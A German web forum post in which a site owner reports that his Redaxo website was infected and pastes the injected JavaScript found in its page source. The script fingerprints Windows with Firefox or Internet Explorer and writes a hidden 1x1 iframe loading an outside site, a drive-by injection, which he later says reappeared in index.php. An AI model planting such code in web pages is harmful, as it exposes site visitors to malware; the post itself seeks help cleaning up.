ich habe gerade per Mail die Meldung von Google bekommen, das meine Webseite infiziert wurde. Ich habe daraufhin als erstes per FTP auf die Seite zugegriffen und fand im Root-Verzeichnis eine Datei "Session.php" diese habe ich leider vorschnell gelöscht.
Leider befindet sich im Quelltext des Redaxo-outputs immer noch ein Script, das dort nicht hingehört!
Dieses Script befindet sich am Ende der Seitenquelltextes:
Code: Alles auswählen
<script type="text/javascript">function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>'); set_cookie('toppedup', '1010101');}</script>
Edit:
Es wurde Redaxo nicht angriffen. Es wurde die index.php im root und die index.php im redaxo-Ordner manipuliert. Die Zeilen habe ich entfernt.
Heute morgen wurde wieder die index.php im root mit einem script versehen, ich habe erstmal die Dateiberechtigung von 644 auf 444 geändert. Mal aschauen ob es hilft. Alles weitere werde ich mit dem Provider absprechen.
MfG
Robert